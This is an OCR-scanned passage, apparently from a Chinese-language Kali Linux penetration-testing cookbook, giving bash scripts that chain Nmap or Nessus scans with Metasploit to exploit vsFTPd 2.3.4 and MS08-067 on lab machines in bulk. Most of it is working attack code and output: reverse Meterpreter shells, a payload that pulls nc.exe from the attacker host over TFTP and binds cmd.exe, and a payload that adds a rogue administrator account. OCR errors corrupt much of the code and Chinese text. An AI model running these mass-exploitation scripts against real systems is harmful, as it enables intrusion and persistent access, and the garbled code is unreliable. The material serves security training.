| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE 

| MS06-025: NO SERVICE (the Ras RPC service is inactive) 

|. MS07-029: NO SERVICE (the Dns Server RPC service is inactive 
) 


Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds 172. 
16.36.225 appears to be vulnerable, exploiting with Metasploit.. 


[*] Please wait while we load the module tree... 





Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting 
with Metasploit Pro -- type 'go pro' to launch it now. 


-[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
-[ 1053 exploits - 590 auxiliary - 174 post 
-[ 275 payloads - 28 encoders - 8 nops 


qo 
Nd e i 
PAYLOAD -» windows/meterpreter/reverse tcp 
RHOST -» 172.16.36.225 

LHOST -» 172.16.36.239 

LPORT -» 4444 


[*] Started reverse handler on 172.16.36.239:4444 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX) 
[*] Attempting to trigger the vulnerability... 

[*] Sending stage (752128 bytes) to 172.16.36.225 


[*] Meterpreter session 1 opened (172.16.36.239:4444 -» 172.16.3 
6.225:1130) at 2014-04-10 05:58:30 -0400 


meterpreter » getuid 
Server username: NT AUTHORITYNSYSTEM 


上 面 的 输出 显示 ， 在 完成 Nmap NSE 脚本 后 ， 将 立即 执行 Metasploit exploit 模块 
并 在 目标 系统 上 返回 一 个 交互 式 Meterpreter shell 。 


工作 原理 


MSFCLI 是 MSF 控制 台 的 有 效 替代 工具 ， 可 用 于 直接 从 终端 执行 单行 命令 ， 而 不 
是 在 交互 式 控制 台中 工作 。 这 使 得 MSFCLI 对 于 bash shell 脚本 中 的 使 用 是 一 个 
很 好 的 功能 。 因 为 可 以 从 bash 终端 执行 NSE 脚本 和 MSFCLI， 所 以 可 以 轻松 编 
E shell 脚本 来 将 这 两 个 功能 组 合 在 一 起 。 


8.4 使 用 MSF 漏洞 利用 的 Nessuscmd 漏洞 扫描 


将 NSE 脚本 和 Metasploit 利用 结合 到 一 起 可 以 减轻 工作 量 。 可 由 NSE 脚本 测试 的 
漏洞 数量 明显 小 于 可 通过 专用 漏洞 扫描 程序 (如 Nessus) 评估 的 漏洞 数量 。 幸运 
的 是 ，Nessus 有 一 个 名 为 Nessuscmd 的 命令 行 工具 ， 也 可 以 在 bash 中 轻松 访 
问 。 该 秘籍 演示 了 如 何 将 Nessus 定向 漏洞 扫描 与 MSF 自动 利用 相 结合 来 验证 发 
现 o 


准备 


为 了 使 用 此 秘籍 中 演示 的 脚本 ， 你 需要 访问 运行 漏洞 服务 的 系统 ， 该 服务 可 以 使 用 
Nessus 进行 标识 ， 并 且 可 以 使 用 Metasploit 进行 利用 。 提供 的 示例 在 
Metasploitable2 服务 器 上 使 用 vsFTPd 2.3.4 后 门 漏洞 。 有 关 设 置 Metasploitable2 
的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Metasploitable2"$548 » 


此 外 ， 本 节 需 要 使 用 文本 编辑 器 (如 VIM À Nano) 将 脚本 写 入 文件 系统 。 有 关 纺 
写 脚本 的 更 多 信息 ， 请 参阅 本 书 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) "A 


H eo 


操作 步骤 


下 面 的 示例 演示 了 如 何 使 用 bash 脚本 ， 将 漏洞 扫描 和 目标 利用 的 任务 结合 到 一 
起 。 在 这 种 情况 下 ，Nessuscmd 用 于 运行 Nessus 插件 ， 测 试 vsFTPd 2.3.4 后 
门 ， 以 确定 系统 是 否 存在 漏洞 ， 然 后 如 果 发 现 系统 存在 漏洞 ， 则 对 系统 执行 相应 的 
Metasploit 漏洞 利用 : 


4! /bin/bash 
if [ ! $1 ]; then echo "Usage: #./script <RHOST>"; exit; fi 
rhost=$1 


/opt/nessus/bin/nessuscmd -p 21 -i 55523 $rhost >> tmp output.tx 
t 
if [ $(grep 55523 output.txt | cut -d " " -f 9) = "55523" ]; 
then echo "$rhost appears to be vulnerable, exploiting with 
Metasploit..."; 
msfcli exploit/unix/ftp/vsftpd 234 backdoor PAYLOAD-cmd/unix 
/ 
interact RHOST=$rhost E; 
ipt 
rm tmp output.txt 


脚本 的 开头 非常 类 似 于 漏洞 扫描 和 利用 脚本 ， 它 将 NSE 扫描 与 前 一 个 秘籍 中 的 
MSF 利用 组 合 在 一 起 。 但 是 ， 由 于 在 此 特定 脚本 中 使 用 了 不 同 的 载荷 ， 因 此 用 户 必 
须 提 供 的 唯一 参数 是 RHOST 值 ， 该 值 应 该 是 目标 系统 的 IP 地 址 。 脚 本 的 正文 以 执 
^f Nessuscmd 工具 开始 。 -p 参数 声明 正在 评估 的 远程 端口 ， -i 参数 声明 插件 
号 。 插 件 55523 对 应 VSFTPd 2.3.4 后 门 的 Nessus 审计 。 然后 ，Nessuscmd 的 
输出 重 定向 到 一 个 名 为 tmp output.txt 的 临时 输出 文件 。 如 果 目 标 系 统 上 存在 
此 漏洞 ， 则 此 脚本 的 输出 将 仅 返 回 播 件 ID。 所 以 下 一 行使 用 if ... then 条 件 语 
名 结合 grep 序列 ， 来 确定 返回 的 输出 中 的 插件 ID。 如 果 输 出 中 返回 了 插件 ID ， 
表明 系统 应 该 存在 漏洞 ， 那 么 将 执行 相应 的 Metasploit 利用 模块 。 


root@KaliLinux:~# ./nessuscmd xploit.sh 
Usage: #./script <RHOST> 


如 果 在 不 提供 任何 参数 的 情况 下 执行 脚本 ， 脚 本 将 输出 相应 的 用 法 。 此 使 用 描述 表 
示 ， 应 使 用 RHOST 参数 执行 脚本 ， 它 用 于 定义 目标 IP 地 址 。 此 输入 值 将 用 于 
Nessuscmd 漏洞 扫描 和 《如 果 存 在 漏洞 ) 使 用 Metasploit 在 目标 系统 上 执行 利 
JH» 在 以 下 示例 中 ， 脚 本 用 于 确定 IP 地 址 为 172.16.36.135 的 主机 是 否 存 在 沁 
洞 。 如果 系 统 被 确定 为 存在 漏洞 ， 则 将 执行 该 利用 ， 并 自动 建立 与 后 门 的 连接 。 


root@KaliLinux:~# ./nessuscmd xploit.sh 172.16.36.135 
172.16.36.135 appears to be vulnerable, exploiting with Metasplo 
qe 

[*] Initializing modules... 

PAYLOAD -» cmd/unix/interact 

RHOST -» 172.16.36.135 

[*] Banner: 220 (vsFTPd 2.3.4) 

[*] USER: 331 Please specify the password. 

[*] Backdoor service has been spawned, handling... 

[+] UID: uid=0(root) gid-O(root) 

[*] Found shell. 

[*] Command shell session 1 opened (172.16.36.232:48126 -» 172.1 
6.36.135:6200) at 2014-04-28 00:29:21 -0400 


whoami 
root 
cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
SyS:X:3:3:sys:/dev:/bin/sh 
sync:x:4:65534: sync:/bin: /bin/sync 

** {TRUNCATED} * * 


因为 Nessuscmd 的 输出 被 重 定向 到 临时 文件 ， 而 不 是 使 用 集成 的 输出 函数 ， 所 以 
没有 脚本 返回 的 输出 来 表明 扫描 成 功 ， 除 了 一 个 字符 串 用 于 指示 系统 看 起 来 存在 
Metasploit 试图 利用 的 漏洞 。 一 旦 脚本 执行 完毕 ， 将 在 目标 系统 上 返回 具 

有 root 权限 的 交互 式 shell。 为 了 演示 这 一 点 ， 我 们 使 用 了 whoami 和 cat 命 
As 


工作 原理 


Nessuscmd X Nessus 漏洞 扫描 器 中 包含 的 命令 行 工 具 。 此 工具 可 用 于 通过 直接 
从 终端 执行 目标 扫描 ， 来 扫描 和 评估 不 同 插件 的 结果 。 因为 该 工具 (如 MSFCLI) 
可 以 轻易 从 bash 终端 调用 ， 所 以 我 们 很 容易 构建 一 个 脚本 ， 将 两 个 任务 串联 到 一 
起 ， 将 漏洞 扫描 与 利用 相 结合 。 


8.5 使 用 反 向 Shell RE 8&3 $ 24€ MSF 漏洞 利用 


使 用 Metasploit 框架 执行 大 型 渗透 测试 的 一 个 困难 ， 是 每 个 利用 必须 按 顺序 单独 执 
行 。 如 果 你 想 确 认 大 量 系统 中 单个 漏洞 的 可 利用 性 ， 单 独 利 用 每 个 漏洞 的 任务 可 能 
变 得 乏味 。 幸运 的 是 ， 通 过 结合 MSFCLI 和 bash 脚本 的 功能 ， 可 以 通过 执行 单个 
脚本 ， 轻 易 在 多 个 系统 上 同时 执行 攻击 。 该 秘籍 演示 了 如 何 使 用 bash 在 多 个 系统 
中 利用 单个 漏洞 ， 并 为 每 个 系统 打开 一 个 Meterpreter shell 。 


准备 


要 使 用 此 秘籍 中 演示 的 脚本 ， 你 需要 访问 多 个 系统 ， 每 个 系统 都 具有 可 使 用 
Metasploit 利用 的 相同 漏洞 。 提供 的 示例 复制 了 运行 Windows XP 漏洞 版 本 的 
VM， 来 生成 MS08-067 漏洞 的 三 个 实例 。 有 关 设 置 Windows 系统 的 更 多 信息 ， 
请 参阅 本 书 第 一 章 中 的 “安装 Windows Server 秘 籍 。 此 外 ， 本 节 还 需要 使 用 文本 
编辑 器 (如 VIM X Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 的 更 多 信息 ， 请 参 
阅 本 书 第 一 章 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


下 面 的 示例 演示 了 如 何 使 用 bash 脚本 同时 利用 单个 漏洞 的 多 个 实例 。 特别 是 
脚本 可 用 于 通过 引用 IP 地 址 的 输入 列表 来 利用 MS08-067 NetAPI 漏洞 的 多 个 
例 : 


> Hh 
x 


#!/bin/bash 
if [ ! $1 ]; then echo "Usage: #./script «host file» <LHOST>"; 
exit; fi 


iplist-$1 
lhost-$2 


i-4444 
for ip in $(cat $iplist) 
do 
gnome-terminal -x msfcli exploit/windows/smb/msO08 067 netapi 


PAYLOAD-windows/meterpreter/reverse tcp 

RHOST-$ip LHOST-$1host LPORT-$i E 

echo "Exploiting $ip and establishing reverse connection on 
local port $1" 
i=$( ($i+1)) 
done 


脚本 使 用 for 循环 ， 对 输入 文本 文件 中 列 出 的 每 个 IP 地址 执行 特定 任务 。 该 特 
定 任务 包括 启动 一 个 新 的 GNOME 终端 ， 该 终端 又 执行 必要 的 msfcli 命令 来 利 
用 该 特定 系统 ， 然 后 启动 反 向 TCP meterpreter shell» 因为 for 循环 为 每 个 
MSFCLI 漏洞 启动 一 个 新 的 GNOME 终端 ， 每 个 都 作为 一 个 独立 的 进程 执行 。 以 
这 种 方式 ， 多 个 进程 可 以 并 行 运行 ， 并 且 每 个 目标 将 被 同时 利用 。 本 地 端口 值 被 初 
始 化 为 4444， 并 且 对 被 利用 的 每 个 附加 系统 增加 1， 使 每 个 meterpreter shell 连接 
到 不 同 的 本 地 端口 。 因 为 每 个 进程 在 独立 的 shell 中 执行 ， 所 以 这 个 脚本 需要 从 图 
形 桌 面 界 面 执行 ， 而 不 是 通过 SSH 连接 执行 。 ./multipwn.sh bash shell 可 
以 执行 如 下 : 


root@KaliLinux:~# ./multipwn.sh 

Usage: #./script «host file» <LHOST> 

root@KaliLinux:~# ./multipwn.sh iplist.txt 172.16.36.239 
Exploiting 172.16.36.132 and establishing reverse connection on 
local port 4444 

Exploiting 172.16.36.158 and establishing reverse connection on 
local port 4445 

Exploiting 172.16.36.225 and establishing reverse connection on 
local port 4446 


如 果 在 不 提供 任何 参数 的 情况 下 执行 脚本 ， 脚 本 将 输出 相应 的 用 法 。 该 使 用 描述 将 
表明 ， 该 脚本 以 定义 监听 IP 系统 的 LHOST 变量 ， 以 及 和 包含 目标 IP 地 址 列表 的 文 
本 文件 的 文件 名 来 执行 。 一旦 以 这 些 参 数 执行 ， 会 开始 弹出 一 系列 新 的 终端 。 这 
些 终端 中 的 每 一 个 将 运行 输入 列表 中 的 IP 地 址 之 一 的 利用 序列 。 原始 的 执行 终端 
将 在 执行 时 输出 进程 列表 。 所 提供 的 示例 利用 了 三 个 不 同 的 系统 ， 并 且 为 每 个 系统 
打开 单独 的 终端 。 其 中 一 个 终端 的 示例 如 下 : 


[*] Please wait while we load the module tree... 





Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting 
with Metasploit Pro -- type 'go pro' to launch it now. 


-[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
+ -- --=[ 1053 exploits - 590 auxiliary - 174 post 
+ -- --z[ 275 payloads - 28 encoders - 8 nops 


PAYLOAD => windows/meterpreter/reverse tcp 

RHOST => 172.16.36.225 

LHOST => 172.16.36.239 

LPORT => 4446 

[*] Started reverse handler on 172.16.36.239:4446 

] Automatically detecting the target... 

] Fingerprint: Windows XP - Service Pack 2 - lang:English 

] Selected Target: Windows XP SP2 English (AlwaysOn NX) 

] Attempting to trigger the vulnerability... 

] Sending stage (752128 bytes) to 172.16.36.225 

] Meterpreter session 1 opened (172.16.36.239:4446 -> 172.16.3 
2 


meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 
meterpreter > 


每 个 终端 启动 单独 的 MSFCLI 实例 并 执行 利用 。 假设 攻击 成 功 ， 会 执行 载荷 ， 并 
且 交 互 式 Meterpreter shell 将 在 每 个 单独 的 终端 中 可 用 。 


工作 原理 
通过 对 每 个 进程 使 用 单独 的 终端 ， 可 以 使 用 单个 bash 脚本 执行 多 个 并 行 利用 。 男 


外 ， 通 过 使 用 为 LPORT 分 配 的 递增 值 ， 可 以 同时 执行 多 个 反 向 meterpreter 
Shell。 


8.6 使 用 可 执行 后 门 的 多 线程 MSF 利用 


该 秘籍 演示 了 如 何 使 用 bash ， 在 多 个 系统 上 利用 单个 漏洞 ， 并 在 每 个 系统 上 打开 
一 个 后 门 。 后 门 包 括 在 目标 系统 上 暂 存 Netcat 可 执行 文件 ， 并 打开 监听 服务 ， 在 
收 到 连接 后 执行 cmd.exe ° 


准备 


要 使 用 此 秘籍 中 演示 的 脚本 ， 你 需要 访问 多 个 系统 ， 每 个 系统 都 具有 可 使 用 
Metasploit 利用 的 相同 漏洞 。 提供 的 示例 复制 了 运行 Windows XP 漏洞 版 本 的 
VM， 来 生成 MS08-067 漏洞 的 三 个 实例 。 有 关 设 置 Windows 系统 的 更 多 信息 ， 
请 参阅 本 书 第 一 章 中 的 “安装 Windows Server 秘 籍 。 此 外 ， 本 节 还 需要 使 用 文本 
编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 的 更 多 信息 ， 请 参 
阅 本 书 第 一 章 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


下 面 的 示例 演示 了 如 何 使 用 bash 脚本 同时 利用 单个 漏洞 的 多 个 实例 。 特别 是 ， 此 
脚本 可 用 于 通过 引用 IP. 地 址 的 输入 列表 ， 来 利用 MS08-067 NetAPI 漏洞 的 多 个 实 
例 : 


#!/bin/bash 
if [ ! $1 ]; then echo "Usage: #./script «host file>"; 
exit; fi 


iplist-$1 


for ip in $(cat $iplist) 
do 
gnome-terminal -x msfcli exploit/windows/smb/msO08 067 netapi 
PAYLOAD-windows/exec CMD="cmd.exe /c \"tftp -i 172.16.36.239 GE 
T nc.exe && nc.exe -lvp 4444 -e cmd.exe\"" RHOST=$ip E 
echo "Exploiting $ip and creating backdoor on TCP port 4444" 


done 


此 脚本 与 上 一 个 秘籍 中 讨论 的 脚本 不 同 ， 因 为 此 脚本 在 每 个 目标 上 安装 一 个 后 门 。 
在 每 个 被 利用 的 系统 上 ， 会 执行 一 个 载荷 ， 它 使 用 集成 的 简单 文件 传输 协议 

(TFTP) 客户 端 来 抓 取 Netcat 可 执行 文件 ， 然 后 使 用 它 在 TCP 端口 4444 上 打开 
一 个 cmd .exe 监听 终端 服务 。 为 此 ，TFTP 服务 将 需要 在 Kali 系统 上 运行 。 这 可 
以 通过 执行 以 下 命令 来 完成 : 


root@KaliLinux:~# atftpd --daemon --port 69 /tmp 
root@KaliLinux:~# cp /usr/share/windows-binaries/nc.exe /tmp/nc. 
exe 


第 一 个 命令 在 UDP 3 v 69 上 启动 TFTP 服务 ， 服 务 目 录 在 / tmp Po 第 二 个 命 
令 用 于 将 Netcat 可 执行 文件 从 Windows-binaries 文件 夹 复制 到 TFTP 目录 。 现 
在 我 们 执行 ./multipwn.sh bash shell : 


root@KaliLinux:~# ./multipwn.sh 

Usage: #./script «host file> 

root@KaliLinux:~# ./multipwn.sh iplist.txt 

Exploiting 172.16.36.132 and creating backdoor on TCP port 4444 
Exploiting 172.16.36.158 and creating backdoor on TCP port 4444 
Exploiting 172.16.36.225 and creating backdoor on TCP port 4444 


如 果 在 不 提供 任何 参数 的 情况 下 执行 脚本 ， 脚 本 将 输出 相应 的 用 法 。 该 使 用 描述 表 
明 ， 该 脚本 应 该 以 一 个 参数 执行 ， 该 参数 指定 了 包含 目标 IP 地 址 列表 的 文本 文件 
的 文件 名 。 一 旦 以 这 个 参数 执行 ， 会 开始 弹出 一 系列 新 的 终端 。 这 些 终端 中 的 每 
一 个 将 运行 输入 列表 中 的 IP 地 址 之 一 的 利用 序列 。 原始 执行 终端 在 它们 被 执行 时 
输出 进程 列表 ， 并 且 表 明 在 每 个 终端 上 创建 后 门 。 在 每 个 终端 中 完成 利用 序列 之 
后 ，Netcat 可 以 用 于 连接 到 由 载荷 打开 的 远程 服务 : 


root@KaliLinux:~# nc -nv 172.16.36.225 4444 
(UNKNOWN) [172.16.36.225] 4444 (?) open 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 


C:\> 


在 提供 的 示例 中 ，IP 地 址 为 172.16.36.225 的 被 利用 的 系统 上 的 TCP 4444 端口 
的 连接 ， 会 生成 可 远程 访问 的 cmd.exe 终端 服务 。 


工作 原理 
Netcat 是 一 个 功能 强大 的 工具 ， 可 以 用 于 各 种 目的 。 虽 然 这 是 远程 执行 服务 的 有 


效 方式 ， 但 不 建议 在 生产 系统 上 使 用 此 技术 。 这 是 因为 任何 可 以 与 监听 端口 建立 
TCP 连接 的 人 都 可 以 访问 Netcat 打开 的 后 门 。 


8.7 使 用 ICMP 验证 多 线程 MSF 利用 

该 秘籍 演示 了 如 何 使 用 bash 利用 跨 多 个 系统 的 单个 漏洞， 并 使 用 ICMP 流量 验证 
每 个 漏洞 的 成 功利 用 。 这 种 技术 需要 很 少 的 开销 ， 并 且 可 以 轻易 用 于 收集 可 利用 的 
系统 列表 。 


准备 


要 使 用 此 秘籍 中 演示 的 脚本 ， 你 需要 访问 多 个 系统 ， 每 个 系统 都 具有 可 使 用 
Metasploit 利用 的 相同 漏洞 。 提供 的 示例 复制 了 运行 Windows XP 漏洞 版 本 的 
VM， 来 生成 MS08-067 漏洞 的 三 个 实例 。 有 关 设 置 Windows 系统 的 更 多 信息 ， 
请 参阅 本 书 第 一 章 中 的 “安装 Windows Server 秘 籍 。 此 外 ， 本 节 还 需要 使 用 文本 
编辑 器 (如 VIM X Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 的 更 多 信息 ， 请 参 
阅 本 书 第 一 章 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


下 面 的 示例 演示 了 如 何 使 用 bash 脚本 同时 利用 单个 漏洞 的 多 个 实例 。 特别 是 
脚本 可 用 于 通过 引用 IP 地 址 的 输入 列表 来 利用 MS08-067 NetAPI 漏洞 的 多 个 
例 : 


> He 
x 


#!/bin/bash 
if [ ! $1 ]; then echo "Usage: #./script «host file>"; 
exit; fi 


iplist=$1 


for ip in $(cat $iplist) 
do 
gnome-terminal -x msfcli exploit/windows/smb/ms08_067_netapi 
PAYLOAD-windows/exec CMD="cmd.exe /c ping \"172.16.36.239 -n 1 
al Ts NY n 
RHOST-$ip E 
echo "Exploiting $ip and pinging" 
done 


此 脚本 与 上 一 个 秘籍 中 讨论 的 脚本 不 同 ， 因 为 载荷 仅仅 从 被 利用 系统 向 攻击 系统 发 
回 ICMP 回响 请 求 。 在 执行 ping 命令 并 使 用 -i 选项 来 指定 生存 时 间 (TTL) 

为 15 时 。 此 备用 TTL 值 用 于 区 分 利用 生成 的 流量 与 正常 ICMP 流量 。 还 应 该 执行 
定制 的 Python 监听 器 脚本 ， 通 过 接收 ICMP 流量 来 识别 被 利用 的 系统 。 这 个 脚本 
如 下 : 


#!/usr/bin/python 


from scapy.all import * 
import logging 
logging. getLogger("scapy.runtime").setLevel(logging.ERROR) 


def rules(pkt): 
Ery: 
if ((pkt[IP].dst=="172.16.36.239") and (pkt[ICMP]) and p 
kt[IP]. ttl <= 15): 
print str(pkt[IP].src) + " is exploitable" 
except: 
pass 


print “Listening for Incoming ICMP Traffic. Use Ctrl+C to stop s 
canning" 
sniff(lfilter-rules,store-0) 


脚本 侦 听 所 有 传 入 的 流量 。 当 接 收 到 TTL 值 为 153 更 小 的 ICMP 数据 包 时 ， 脚 本 
将 系统 标记 为 可 利用 。 


root@KaliLinux:~# ./listener.py 
Listening for Incoming ICMP Traffic. Use Ctrl+C to stop scanning 


Python 流量 监听 器 应 该 首先 执行 。 脚本 最 初 不 应 生成 输出 。 此 脚本 应 该 在 开发 过 
程 的 整个 时 间 内 持续 运行 。 一 旦 脚本 运行 ， 应 该 启动 bash 利用 脚本 。 


root@KaliLinux:~# ./multipwn.sh iplist.txt 
Exploiting 172.16.36.132 and pinging 
Exploiting 172.16.36.158 and pinging 
Exploiting 172.16.36.225 and pinging 


当 执 行 脚本 时 ， 原 始终 端 shell 会 显示 每 个 系统 正在 被 利用 ， 并 且 正 在 执 
ff ping 序列 。 还 将 为 输入 列表 中 的 每 个 IP 地 址 打开 一 个 新 的 GNOME 终端 。 
当 每 个 利用 过 程 完成 时 ， 应 该 从 目标 系统 发 起 ICMP 回响 请 求 : 


root@KaliLinux:~# ./listener.py 
Listening for Incoming ICMP Traffic. Use Ctrl+C to stop scanning 


172.16.36.132 is exploitable 
172.16.36.158 is exploitable 
172.16.36.225 is exploitable 


假设 攻击 成 功 ，Python 监听 脚本 会 识别 生成 的 流量 ， 并 将 ICMP 流量 的 每 个 源 IP 
地 址 列 为 可 利用 。 


工作 原理 


ICMP 流量 似乎 是 一 种 用 于 验证 目标 系统 的 可 利用 性 的 非 直观 方式 。 然而 ， 它 实际 
上 工作 得 很 好 。 单个 ICMP 回响 请 求 在 目标 系统 上 没有 留 下 任何 利用 的 痕迹 ， 并 且 
不 需要 过 多 的 开销 。 此 外 ， 将 TTL 值 设 为 15 不 太 可 能 产生 误 报 ， 因 为 几乎 所 有 系 
统 都 以 128 或 更 高 的 TTL 值 开始 。 


8.8 创建 管理 账户 的 多 线程 MSF 利用 


该 秘籍 展示 了 如 何 使 用 bash ， 在 多 个 系统 上 利用 单个 漏洞 ， 并 在 每 个 系统 上 添加 
一 个 新 的 管理 员 帐 户 。 该 技术 可 以 用 于 以 后 通过 使 用 集成 终端 服务 或 SMB 认证 来 
访问 沦陷 的 系统 。 


准备 


要 使 用 此 秘籍 中 演示 的 脚本 ， 你 需要 访问 多 个 系统 ， 每 个 系统 都 具有 可 使 用 
Metasploit 利用 的 相同 漏洞 。 提供 的 示例 复制 了 运行 Windows XP 漏洞 版 本 的 
VM， 来 生成 MS08-067 漏洞 的 三 个 实例 。 有 关 设 置 Windows 系统 的 更 多 信息 ， 
请 参阅 本 书 第 一 章 中 的 “安装 Windows Server 秘 籍 。 此 外 ， 本 节 还 需要 使 用 文本 
编辑 器 (如 VIM X Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 的 更 多 信息 ， 请 参 
阅 本 书 第 一 章 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


下 面 的 示例 演示 了 如 何 使 用 bash 脚本 同时 利用 单个 漏洞 的 多 个 实例 。 特别 是 
脚本 可 用 于 通过 引用 IP. 地 址 的 输入 列表 来 利用 MS08-067 NetAPI 漏洞 的 多 个 
例 : 


> He 
x 


#!/bin/bash 


if [ ! $1 ]; then echo "Usage: #./script «host file> «username» 
<password>"; 
exit: fi 


iplist=$1 
user=$2 
pass=$3 


for ip in $(cat $iplist) 
do 
gnome-terminal -x msfcli exploit/windows/smb/ms08_067_netapi 
PAYLOAD=windows/exec CMD="cmd.exe /c \"net user $user $pass /ad 
d && net localgroup administrators $user /add\"" RHOST=$ip E 
echo "Exploiting $ip and adding user $user" 
done 


由 于 载荷 不 同 ， 此 脚本 与 以 前 的 多 线程 利用 脚本 不 同 。 这 里 ， 在 成 功利 用 时 会 依次 
执行 两 个 命令 。 这 两 个 命令 中 的 第 一 个 命令 创建 一 个 名 为 hutch 893170] P RP » 
并 定义 关联 的 密码 。 第 二 个 命令 将 新 创建 的 用 户 帐 户 添加 到 本 

地 Administrators 组 : 


root@KaliLinux:~# ./multipwn.sh 

Usage: #./script «host file» «username» «password» 
root@KaliLinux:~# ./multipwn.sh iplist.txt hutch P@33word 
Exploiting 172.16.36.132 and adding user hutch 

Exploiting 172.16.36.158 and adding user hutch 

Exploiting 172.16.36.225 and adding user hutch 


如 果 在 不 提供 任何 参数 的 情况 下 执行 脚本 ， 脚 本 将 输出 相应 的 用 法 。 该 使 用 描述 表 
明 ， 该 脚本 应 该 以 一 个 参数 来 执行 ， 该 参数 指定 了 包含 目标 IP 地 址 列表 的 文本 文 
件 的 文件 名 。 一 旦 以 这 个 参数 执行 ， 会 开始 弹出 一 系列 新 的 终端 。 这 些 终端 中 的 
每 一 个 将 运行 输入 列表 中 的 IP 地 址 之 一 的 利用 序列 。 原始 执行 终端 将 在 执行 时 输 
出 进程 列表 ， 并 显 是 在 每 个 进程 上 添加 的 新 用 户 帐 户 。 在 每 个 终端 中 完成 利用 序列 
之 后 ， 可 以 通过 诸如 RDP 的 集成 终端 服务 ， 或 通过 远程 SMB 认证 来 访问 系统 。 
为 了 演示 添加 了 该 帐户 ，Metasploit SMB Login 辅助 模块 用 于 使 用 新 添加 的 凭据 远 
程 登 录 到 受 攻 击 的 系统 : 


msf > use auxiliary/scanner/smb/smb login 

msf  auxiliary(smb login) > set SMBUser hutch 
SMBUser => hutch 

msf auxiliary(smb_login) > set SMBPass P@33word 
SMBPass => P@33word 

msf auxiliary(smb_login) > set RHOSTS 172.16.36.225 
RHOSTS => 172.16.36.225 

msf auxiliary(smb_login) > run 


[*] 172.16.36.225:445 SMB - Starting SMB login bruteforce 

[+] 172.16.36.225:445 - SUCCESSFUL LOGIN (Windows 5.1) hutch : 
[STATUS_ SUCCESS] 

[*] Username is case insensitive 

[*] Domain is ignored 

[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed 


SMB Login 辅助 模块 的 结果 表明 ， 使 用 新 创建 的 凭据 登录 成 功 。 然后 ， 这 个 新 创 
建 的 帐户 可 以 用 于 进一步 的 恶意 目的 ， 或 者 可 以 使 用 脚本 来 测试 帐户 是 否 存 在 ， 来 
难 证 漏洞 的 利用 。 


工作 原理 


通过 在 每 个 利用 的 系统 上 添加 用 户 帐 户 ， 攻 击 者 可 以 继续 对 该 系统 执行 后 续 操作 。 
这 种 方法 有 优点 和 缺点 。 在 受 沦 陷 系 统 上 添加 新 帐户 比 攻 破 现 有 帐户 更 快 ， 并 且 可 
以 立即 访问 现 有 的 远程 服务 (如 RDP) 。 但 是 ， 添 加 新 帐户 并 不 非常 隐秘 ， 有 时 


可 以 触发 基于 主机 的 入 侵 检 测 系 统 的 警报 。 


